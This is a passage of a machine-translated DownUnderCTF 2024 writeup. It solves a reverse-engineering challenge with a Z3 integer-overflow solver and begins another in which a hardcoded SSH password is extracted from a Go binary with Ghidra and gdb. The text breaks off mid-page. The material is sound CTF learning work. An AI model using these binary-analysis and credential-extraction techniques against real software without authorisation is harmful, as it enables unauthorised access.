{"componentChunkName":"component---src-templates-post-template-js","path":"/ctf-ductf-2024-en","result":{"data":{"markdownRemark":{"id":"6035b97d-fba5-56c3-b555-b2edf6606e84","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/ctf-ductf-2024\">original page</a>.</p>\n</blockquote>\n<p>This is a writeup for DownUnderCTF (DUCTF) 2024.</p>\n<p>I’m very grateful that DUCTF publishes proper official writeups.</p>\n<p>Reference: <a href=\"https://github.com/DownUnderCTF/Challenges_2024_Public/tree/main\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">DownUnderCTF/Challenges_2024_Public: Files + Solutions for DownUnderCTF 2024 Challenges</a></p>\n<h2 id=\"table-of-contents\" style=\"position:relative;\"><a href=\"#table-of-contents\" aria-label=\"table of contents permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Table of Contents</h2>\n<ul>\n<li><a href=\"#number-mashingrev\">number mashing(Rev)</a></li>\n<li>\n<p><a href=\"#sssshhhhrev\">sssshhhh(Rev)</a></p>\n<ul>\n<li><a href=\"#identifying-the-password-checking-code\">Identifying the password-checking code</a></li>\n<li><a href=\"#investigating-what-happens-after-login\">Investigating what happens after login</a></li>\n</ul>\n</li>\n<li><a href=\"#vector-overflowpwn\">vector overflow(Pwn)</a></li>\n<li><a href=\"#yawapwn\">yawa(Pwn)</a></li>\n<li><a href=\"#babys-first-forensicsforensic\">Baby’s First Forensics(Forensic)</a></li>\n<li><a href=\"#sam-i-amforensic\">SAM I 
AM(Forensic)</a></li>\n<li><a href=\"#bad-policiesforensic\">Bad Policies(Forensic)</a></li>\n<li><a href=\"#emuc2forensic\">emuc2(Forensic)</a></li>\n<li><a href=\"#macro-magicforensic\">Macro Magic(Forensic)</a></li>\n<li>\n<p><a href=\"#lost-in-memoryforensic\">Lost in Memory(Forensic)</a></p>\n<ul>\n<li><a href=\"#task-1\">Task 1</a></li>\n<li><a href=\"#task-2\">Task 2</a></li>\n<li><a href=\"#task-3\">Task 3</a></li>\n<li><a href=\"#task-4\">Task 4</a></li>\n</ul>\n</li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"number-mashingrev\" style=\"position:relative;\"><a href=\"#number-mashingrev\" aria-label=\"number mashingrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>number mashing(Rev)</h2>\n<blockquote>\n<p>Mash your keyboard numpad in a specific order and a flag might just pop out!</p>\n</blockquote>\n<p>When I decompiled the challenge binary, I found that it executes the following code.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\"><span class=\"token function\">printf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Give me some numbers: \"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token function\">__isoc99_scanf</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"%d %d\"</span><span class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>A<span 
class=\"token punctuation\">,</span><span class=\"token operator\">&amp;</span>B<span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">(</span>A <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">==</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token operator\">||</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">==</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Nope!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span>\nx <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    x <span class=\"token operator\">=</span> A <span class=\"token operator\">/</span> B<span class=\"token punctuation\">;</span>\n<span class=\"token 
punctuation\">}</span>\n<span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>x <span class=\"token operator\">!=</span> A<span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    <span class=\"token function\">puts</span><span class=\"token punctuation\">(</span><span class=\"token string\">\"Nope!\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n    <span class=\"token function\">exit</span><span class=\"token punctuation\">(</span><span class=\"token number\">1</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>It seems you can get the flag by supplying input where the result x of <code class=\"language-text\">x = A / B</code> becomes equal to A, using a non-zero <code class=\"language-text\">int</code> A and an <code class=\"language-text\">int</code> B that is neither 0 nor 1.</p>\n<p>I immediately realized that this probably involved taking advantage of integer overflow, but I couldn’t make such values by hand.</p>\n<p>After wasting a bunch of time, I finally realized I could just solve it with Z3, wrote the following solver, and got the flag in three minutes.</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> z3 <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\nA <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string\">\"A\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">32</span><span class=\"token punctuation\">)</span>\nB <span class=\"token operator\">=</span> BitVec<span class=\"token punctuation\">(</span><span class=\"token string\">\"B\"</span><span class=\"token punctuation\">,</span> <span 
class=\"token number\">32</span><span class=\"token punctuation\">)</span>\ns <span class=\"token operator\">=</span> Solver<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>A <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">)</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>B <span class=\"token operator\">!=</span> <span class=\"token number\">1</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># '/' on 32-bit BitVecs is signed division, matching C int division</span>\ns<span class=\"token punctuation\">.</span>add<span class=\"token punctuation\">(</span>A <span class=\"token operator\">==</span> <span class=\"token punctuation\">(</span>A<span class=\"token operator\">/</span>B<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">.</span>check<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>s<span class=\"token punctuation\">.</span>model<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token comment\"># [B = 4294967295, A = 2147483648]</span></code></pre></div>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 883px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 
7.083333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAABCAYAAADeko4lAAAACXBIWXMAAAsTAAALEwEAmpwYAAAASUlEQVQI1x3GWw5AMBBAUUmZmc4GRJQ+UoT97+8SX+cMqSykOlOOlX41tlzZS+O8H2o/flMuiDmjGJNG9LuqEqNhZogK7k4IgRcHSxiwZb3/fwAAAABJRU5ErkJggg=='); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/b8ea71f39cbefd289203429991929855/8ac56/image-20240706120230451.webp 240w,\n/static/b8ea71f39cbefd289203429991929855/d3be9/image-20240706120230451.webp 480w,\n/static/b8ea71f39cbefd289203429991929855/d4bc4/image-20240706120230451.webp 883w\"\n              sizes=\"(max-width: 883px) 100vw, 883px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/b8ea71f39cbefd289203429991929855/8ff5a/image-20240706120230451.png 240w,\n/static/b8ea71f39cbefd289203429991929855/e85cb/image-20240706120230451.png 480w,\n/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png 883w\"\n            sizes=\"(max-width: 883px) 100vw, 883px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/b8ea71f39cbefd289203429991929855/fe9f1/image-20240706120230451.png\"\n            alt=\"image-20240706120230451\"\n            title=\"image-20240706120230451\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<h2 id=\"sssshhhhrev\" style=\"position:relative;\"><a href=\"#sssshhhhrev\" aria-label=\"sssshhhhrev permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 
1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>sssshhhh(Rev)</h2>\n<blockquote>\n<p>Great news! We found the Kookaburras!… Bad news.. They’re locked up. We’ve managed to get access to the central terminal and ripped a binary off of it for you to analyse. Maybe you can find a way to free our friends?</p>\n</blockquote>\n<p>When I decompiled the challenge binary, it appeared to be a Go binary using a library called Wish.</p>\n<p>Wish is a library for creating applications that can be accessed remotely over SSH.</p>\n<p>Reference: <a href=\"https://github.com/charmbracelet/wish\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">charmbracelet/wish: Make SSH apps, just like that! 💫</a></p>\n<p>When I actually connected to the challenge binary, it asked for a password for SSH access.</p>\n<p>The password requested there seemed to be different from an actual Linux user’s password, so I assumed it was likely defined inside the program.</p>\n<p>So I decided to search the decompiled output for code that registers or verifies the password.</p>\n<h3 id=\"identifying-the-password-checking-code\" style=\"position:relative;\"><a href=\"#identifying-the-password-checking-code\" aria-label=\"identifying the password checking code permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Identifying the 
password-checking code</h3>\n<p>Eventually, after searching the Ghidra symbol tree for the string <code class=\"language-text\">password</code>, I found that a variable with the symbol name <code class=\"language-text\">password_spill</code> exists in the <code class=\"language-text\">RunSSH</code> code inside the <code class=\"language-text\">main</code> function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 468px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 76.25%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/ffd322eb602eb6a3b179ef87537f8248/8ac56/image-20240709235202473.webp 240w,\n/static/ffd322eb602eb6a3b179ef87537f8248/0799c/image-20240709235202473.webp 468w\"\n              sizes=\"(max-width: 468px) 100vw, 468px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/ffd322eb602eb6a3b179ef87537f8248/8ff5a/image-20240709235202473.png 240w,\n/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png 468w\"\n            sizes=\"(max-width: 468px) 100vw, 468px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/ffd322eb602eb6a3b179ef87537f8248/90372/image-20240709235202473.png\"\n            alt=\"image-20240709235202473\"\n            title=\"image-20240709235202473\"\n            loading=\"lazy\"\n            
style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The decompiled output of this function was as follows.</p>\n<p>The check <code class=\"language-text\">param_1 == 0x23</code> looked suspicious, as if it might be validating the password string.</p>\n<div class=\"gatsby-highlight\" data-language=\"c\"><pre class=\"language-c\"><code class=\"language-c\">undefined8 main<span class=\"token punctuation\">.</span>RunSSH<span class=\"token punctuation\">.</span><span class=\"token function\">func2</span><span class=\"token punctuation\">(</span><span class=\"token keyword\">long</span> param_1<span class=\"token punctuation\">)</span>\n<span class=\"token punctuation\">{</span>\n  undefined8 uVar1<span class=\"token punctuation\">;</span>\n  <span class=\"token keyword\">long</span> unaff_R14<span class=\"token punctuation\">;</span>\n  github<span class=\"token punctuation\">.</span>com<span class=\"token operator\">/</span>charmbracelet<span class=\"token operator\">/</span>ssh<span class=\"token punctuation\">.</span>Context ctx_spill<span class=\"token punctuation\">;</span>\n  string password_spill<span class=\"token punctuation\">;</span>\n  \n  <span class=\"token keyword\">while</span> <span class=\"token punctuation\">(</span><span class=\"token operator\">&amp;</span>stack0x00000000 <span class=\"token operator\">&lt;=</span> <span class=\"token operator\">*</span><span class=\"token punctuation\">(</span>undefined <span class=\"token operator\">*</span><span class=\"token operator\">*</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">(</span>unaff_R14 <span class=\"token operator\">+</span> <span class=\"token number\">0x10</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    runtime<span class=\"token punctuation\">.</span><span 
class=\"token function\">morestack_noctxt</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">if</span> <span class=\"token punctuation\">(</span>param_1 <span class=\"token operator\">==</span> <span class=\"token number\">0x23</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">{</span>\n    uVar1 <span class=\"token operator\">=</span> runtime<span class=\"token punctuation\">.</span><span class=\"token function\">memequal</span><span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">else</span> <span class=\"token punctuation\">{</span>\n    uVar1 <span class=\"token operator\">=</span> <span class=\"token number\">0</span><span class=\"token punctuation\">;</span>\n  <span class=\"token punctuation\">}</span>\n  <span class=\"token keyword\">return</span> uVar1<span class=\"token punctuation\">;</span>\n<span class=\"token punctuation\">}</span></code></pre></div>\n<p>Although it is not shown in this decompilation result because Ghidra apparently could not analyze the binary properly, the disassembly shows that a hardcoded string is passed as an argument to the <code class=\"language-text\">memequal</code> function, as shown below.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 863px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 50.83333333333333%; 
position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/514682c7262cb9281442ad72c1e208fe/8ac56/image-20240709235520768.webp 240w,\n/static/514682c7262cb9281442ad72c1e208fe/d3be9/image-20240709235520768.webp 480w,\n/static/514682c7262cb9281442ad72c1e208fe/8e594/image-20240709235520768.webp 863w\"\n              sizes=\"(max-width: 863px) 100vw, 863px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/514682c7262cb9281442ad72c1e208fe/8ff5a/image-20240709235520768.png 240w,\n/static/514682c7262cb9281442ad72c1e208fe/e85cb/image-20240709235520768.png 480w,\n/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png 863w\"\n            sizes=\"(max-width: 863px) 100vw, 863px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/514682c7262cb9281442ad72c1e208fe/ee455/image-20240709235520768.png\"\n            alt=\"image-20240709235520768\"\n            title=\"image-20240709235520768\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>For this function, Binary Ninja produced a more accurate decompilation.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 935px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    
style=\"padding-bottom: 55.41666666666667%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/8ac56/image-20240710000737657.webp 240w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/d3be9/image-20240710000737657.webp 480w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/c7dd1/image-20240710000737657.webp 935w\"\n              sizes=\"(max-width: 935px) 100vw, 935px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/8ff5a/image-20240710000737657.png 240w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/e85cb/image-20240710000737657.png 480w,\n/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png 935w\"\n            sizes=\"(max-width: 935px) 100vw, 935px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7d1cb4fa2a138e34a84aa4bb598029ab/eb390/image-20240710000737657.png\"\n            alt=\"image-20240710000737657\"\n            title=\"image-20240710000737657\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>The <code class=\"language-text\">memequal</code> called here seems to compare whether the argument values match.</p>\n<p>I actually tried entering the hardcoded string <code class=\"language-text\">ManIReallyHateThoseDamnKookaburras!</code> as the password, and the check succeeded, confirming that this was indeed where the password was being verified.</p>\n<p>However, even though the password check passed, the text <code class=\"language-text\">No valid command</code> was displayed and the 
connection was closed, so I still couldn’t determine the flag.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 719px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 69.58333333333333%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/7eb14052f28922d81df640ab9167f485/8ac56/image-20240710001206256.webp 240w,\n/static/7eb14052f28922d81df640ab9167f485/d3be9/image-20240710001206256.webp 480w,\n/static/7eb14052f28922d81df640ab9167f485/05ca6/image-20240710001206256.webp 719w\"\n              sizes=\"(max-width: 719px) 100vw, 719px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/7eb14052f28922d81df640ab9167f485/8ff5a/image-20240710001206256.png 240w,\n/static/7eb14052f28922d81df640ab9167f485/e85cb/image-20240710001206256.png 480w,\n/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png 719w\"\n            sizes=\"(max-width: 719px) 100vw, 719px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/7eb14052f28922d81df640ab9167f485/073e9/image-20240710001206256.png\"\n            alt=\"image-20240710001206256\"\n            title=\"image-20240710001206256\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    
</span></p>\n<p>From here, it looked like I needed to identify some way this program returns the flag.</p>\n<h3 id=\"investigating-what-happens-after-login\" style=\"position:relative;\"><a href=\"#investigating-what-happens-after-login\" aria-label=\"investigating what happens after login permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Investigating what happens after login</h3>\n<p>When I log in to this app over SSH, after <code class=\"language-text\">Welcome &lt;USER></code> it shows the following line: <code class=\"language-text\">This is the Kookaburra holding cells. 
Contained: 11912 Kookaburras\n        -> No valid command</code>.</p>\n<p>From this, I could tell that I would probably get the flag by executing some valid command over SSH.</p>\n<p>It appears that the Wish library handles SSH commands with a function called <code class=\"language-text\">Command</code>.</p>\n<p>Reference: <a href=\"https://github.com/charmbracelet/wish/blob/4f1d502c6a084e95b0065dbacdba94fbc295c992/cmd.go#L27\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">wish/cmd.go at 4f1d502c6a084e95b0065dbacdba94fbc295c992 · charmbracelet/wish</a></p>\n<p>As a quick test, I searched the symbol tree for the text <code class=\"language-text\">Command</code>, and found the function <code class=\"language-text\">github.com/charmbracelet/ssh.(*session).Command</code>.</p>\n<p>That looked like the function handling commands received over SSH.</p>\n<p>When I set a breakpoint there and ran it, I confirmed that it really does process the received command inside this function.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/0921cc74ebd87a9a622e8f735d44aa08/b5dee/image-20240710214046961.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 52.5%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/0921cc74ebd87a9a622e8f735d44aa08/8ac56/image-20240710214046961.webp 240w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/d3be9/image-20240710214046961.webp 480w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/e46b2/image-20240710214046961.webp 
960w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/3deba/image-20240710214046961.webp 1237w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/0921cc74ebd87a9a622e8f735d44aa08/8ff5a/image-20240710214046961.png 240w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/e85cb/image-20240710214046961.png 480w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/d9199/image-20240710214046961.png 960w,\n/static/0921cc74ebd87a9a622e8f735d44aa08/b5dee/image-20240710214046961.png 1237w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/0921cc74ebd87a9a622e8f735d44aa08/d9199/image-20240710214046961.png\"\n            alt=\"image-20240710214046961\"\n            title=\"image-20240710214046961\"\n            loading=\"lazy\"\n            style=\"width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;\"\n          />\n        </picture>\n  </a>\n    </span></p>\n<p>Stepping through with gdb showed that this function passes the received command to <code class=\"language-text\">main.RunSSH.MiddlewareWithLogger.func8.1</code>, and during the processing of that function, <code class=\"language-text\">No valid command</code> was printed.</p>\n<p><span\n      class=\"gatsby-resp-image-wrapper\"\n      style=\"position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 960px; \"\n    >\n      <a\n    class=\"gatsby-resp-image-link\"\n    href=\"/static/6ef31e4e589bd332c2755f3ae8378746/8de58/image-20240710214133949.png\"\n    style=\"display: block\"\n    target=\"_blank\"\n    rel=\"noopener\"\n  >\n    <span\n    class=\"gatsby-resp-image-background-image\"\n    style=\"padding-bottom: 72.91666666666666%; position: relative; bottom: 0; left: 0; background-image: 
url('data:image/png;base64,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'); background-size: cover; display: block;\"\n  ></span>\n  <picture>\n          <source\n              srcset=\"/static/6ef31e4e589bd332c2755f3ae8378746/8ac56/image-20240710214133949.webp 240w,\n/static/6ef31e4e589bd332c2755f3ae8378746/d3be9/image-20240710214133949.webp 480w,\n/static/6ef31e4e589bd332c2755f3ae8378746/e46b2/image-20240710214133949.webp 960w,\n/static/6ef31e4e589bd332c2755f3ae8378746/4fba2/image-20240710214133949.webp 1219w\"\n              sizes=\"(max-width: 960px) 100vw, 960px\"\n              type=\"image/webp\"\n            />\n          <source\n            srcset=\"/static/6ef31e4e589bd332c2755f3ae8378746/8ff5a/image-20240710214133949.png 240w,\n/static/6ef31e4e589bd332c2755f3ae8378746/e85cb/image-20240710214133949.png 480w,\n/static/6ef31e4e589bd332c2755f3ae8378746/d9199/image-20240710214133949.png 960w,\n/static/6ef31e4e589bd332c2755f3ae8378746/8de58/image-20240710214133949.png 1219w\"\n            sizes=\"(max-width: 960px) 100vw, 960px\"\n            type=\"image/png\"\n          />\n          <img\n            class=\"gatsby-resp-image-image\"\n            src=\"/static/6ef31e4e589bd332c2755f3ae8378746/d9199/image-20240710214133949.png\"\n            alt=\"image-20240710214133949\"\n            